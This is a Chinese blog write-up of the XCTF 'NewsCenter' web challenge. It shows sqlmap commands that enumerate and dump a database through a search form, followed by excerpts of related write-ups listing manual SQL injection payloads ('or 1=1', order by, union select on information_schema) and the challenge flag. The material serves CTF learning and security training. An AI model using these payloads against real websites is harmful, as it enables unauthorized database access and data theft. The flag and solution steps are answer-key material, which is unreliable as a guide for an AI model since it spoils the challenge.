攻防世界-WEB-NewsCenter

最新推荐文章于 2024-05-18 20:54:16 发布
原创 最新推荐文章于 2024-05-18 20:54:16 发布 · 404 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #改行学it

本文展示了如何通过Python的sqlmap工具进行SQL注入攻击,包括各个步骤:检测、数据库操作和信息提取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开环境

有查询,猜测是sql注入

保存请求头到文件中

准备利用sqlmap

查找数据库

python sqlmap.py -r ./123.txt --dbs

查找表

python sqlmap.py -r ./123.txt --tables -D news

查找字段

python sqlmap.py -r ./123.txt --column -D news -T secret_table

显示字段信息

python sqlmap.py -r ./123.txt --dump -D news -T secret_table -C fl4g

得到flag

QCTF{sq1_inJec7ion_ezzz

攻防世界】八 --- NewsCenter
qq_43168364的博客
12-23 605
题目 — NewsCenter 一、writeup 主页一个search输入框,我们来测试sql注入漏洞 输入单引号,回显 500 ,大概率是一个字符型注入点 字段数:3 显示位:2,3 库名:news,用户名:[email protected] 表名:news, secret_table secret_table表字段名:id,fl4g 读数据,的flag 二、知识点 sql注入 ......
攻防世界-NewsCenter
weixin_46784800的博客
11-12 1659
攻防世界-NewsCenter题 首先,进入靶场网站,发现是一个News界面,并且界面存在一个搜索入口,此时的第一感觉就是,这道题应该是一道sql注入的题目(后来发现确实是这样) 在搜索框输入一系列数字或字母进行搜索,可搜索出来一些News: 打开HackBar,在POST请求值处的字符串末尾输入单引号,尝试是否能发生单引号闭合: 发现请求的返回值为500,则说明该请求在服务器的数据库中发生了单引号闭合,导致数据库查询失败,这时已经可以实锤本题为数据库注入的题目了。 首先,通过order语句,判断查询
攻防世界-web-newscenter
wuh2333的博客
05-30 1177
攻防世界,sql注入
攻防世界NewsCenter
weixin_51030879的博客
07-23 1313
攻防世界NewsCenter
攻防世界---NewsCenter
weixin_43803070的博客
07-15 545
废话不多说,直接上思路。 ** 手工注入: ** 1' //报错, 判断字段: 1' order by 3# //最终我们得到是三个字段,在这里们用--+代替#,竟然报错。 回显字段: -1' union select 1,2,3# 爆出数据库(两种方法): -1' union select 1,2,database()# -1' union select 1,2,group_conc...
攻防世界NewsCenter
weixin_52268949的博客
01-23 876
NewsCenter 打开题目是一个搜索框我们首先尝试一下sql注入 判断了一下是使用’'进行包裹的字符型sql注入 然后我们需要判断数据库列数 1' order by 3# 回显正常但by4的时候回显就不正常了 所以判断数据库有三列 下面就是一些常规操作了,首先看看回显位 -1' union select 1,2,3# 写-1的原因是不要让正常数据影响到我们注入测出的结果 测试数据库 -1' union select 1,2,group_concat(schema_name) from info
攻防世界-web高手进阶区
zji
04-25 7057
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界-web进阶区
楼阁de猫的博客
10-30 1083
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
攻防世界 WEB NewsCenter
ChaoYue_miku的博客
01-08 316
攻防世界 WEB NewsCenter NewsCenter:   题目只有一个搜索框,下面显示搜索结果,最先考虑的就是sql注入,先简单构造' or '1=1,果然返回了所有新闻(7条)查看网页源码,发现这里是post方式,可以考虑使用sqlmap。   但是如此形式的sql漏洞应该还有别的方法,毕竟这一看就没有任何过滤验证,也没有提前预编译,是最基础的sql漏洞了,在这里尝试手工构造语句,看看能不能获得什么信息。   通常的方法就是单引号、1、2等尝试,然...
攻防世界 WEB newscenter
qq_41696858的博客
08-03 373
看到提交框就条件反射sql注入 先sqlmap跑,能跑的情况下优先 把burpsuite抓到的包保存为1.txt sqlmap -l 1.txt sqlmap -l 1.txt --dbs sqlmap -l 1.txt -D news --tables sqlmap -l 1.txt -D news -T secret_tables --columns --dump 一套组合拳打完,成功拿到flag 当然可以自己手工注入 ' and 0 union select 1,table_schema,tabl
攻防世界-NewsCenter
weixin_39579781的博客
05-06 1724
题目打开是有个输入框可以用来输入搜索信息,初步判断是个sql注入的题目。接下来判断能否进行sql注入:输入 hi,有搜索结果,如下图:输入hi’,无结果,如下图:初步判定是hi‘后面还有单引号,导致重复输入导致的,(单引号与服务端代码中的’形成闭合,将我们输入的字符串hello包裹,服务端代码后面多出来一个‘导致语法错误,而加入#将后面的’注释掉之后不会报错,可确定为字符型SQL注入。
攻防世界NewsCenter
qq_44111753的博客
11-17 325
题目 WP 在searchnew中随意输入字符串,burpsuite抓包 发现输入的字符串以post形式提交给了search参数 将http请求打包,用sqlmap探测search参数是否存在sql注入风险 注入成功 接下来直接将后台数据库直接输出 sqlmap -r searech -p search --dump 找到flag啦~ 手动注入: 发现哪一列可以回显 打印数据库的表 search=0' union select 1,group_concat(table_name),3 from
攻防世界WEBNewsCenter
qq_54929891的博客
10-06 247
哈哈在另一个平台习了一段时间的sql注入,我便再来写这个NewsCenter题目啦 第一步:检查是否有注入点,是否可以通过恒真恒假的语句来改变输出结果 这个题目里面是有引号的哈,因为你不把引号括回去并且加一个注释符,直接给你报错页面了 这里我们可以看到恒真恒假语句测试出来了可以通过改变search值来改变sql语句 第二部:来判断语句的回显位置 可以看到news返回数据是在2,3的位置,这样我们保留1,只需要改变2,3就可以了,先查一下数据库 得知数据库的名字叫做news...
攻防世界-Web-Newscenter
uh_eng的博客
08-16 256
0x01 打开题目看到一个网页,里面只有一个搜索输入框是我们可以控制的,所以猜测可能是SQL注入。尝试123asdqwe' or 1=1#发现能够查询出所有新闻。 继续尝试' union select 1,2,3#,验证select查询了三个字段: 0x02 已经可以判定是联合注入,接下来就简单了。 查询当前数据库 1' union select 1,2,database()#,得到数据库为news 查询当前库中的表 1' union select 1,table_name,3 from informa
攻防世界---web---NewsCenter
最新发布
2201_75556700的博客
05-18 943
5、查询列数,查3列的时候,没有报错,再查4列的时候,报错了,所以有三列。6、使用联合查询查数据库名,数据库名为news。4、接着判断注入类型,说明存在字符型注入。8、查secret_table中的字段名。2、打开链接,类似于一个搜索新闻的界面。3、因为有文本框,所以尝试注入。试着搜索第一条新闻hello。9、查fl4g字段中的值。
攻防世界wp-newscenter
weixin_43916608的博客
07-21 297
根据搜索条件,考虑题目为sql注入 1. 输入语句’ and 0 union select 1,2,3 from information_schema.tables#,查看数据库返回列数 查询结果说明,数据库返回的列数为3 2.查询数据库名称 ’ and 0 union select 1,2,table_schema from information_schema.tables#,查询结果可知,数...
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来了解更多信息。此外,NewsCenter还涉及到CTF(Capture The Flag)比赛和SQL注入攻击的内容。在这个应用程序中,有两个表,分别是news和secret_table,我们需要从secret_table表中找到flag(标志)。通过构造SQL语句,并利用搜索(search)功能,我们可以使用union select和group_concat函数来获取所需的信息。最后,通过执行以下SQL语句search=-1' union select 1,version(),group_concat(fl4g) from secret_table --,我们可以得到flag的值为QCTF{sq1_inJec7ion_ezzz}。这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值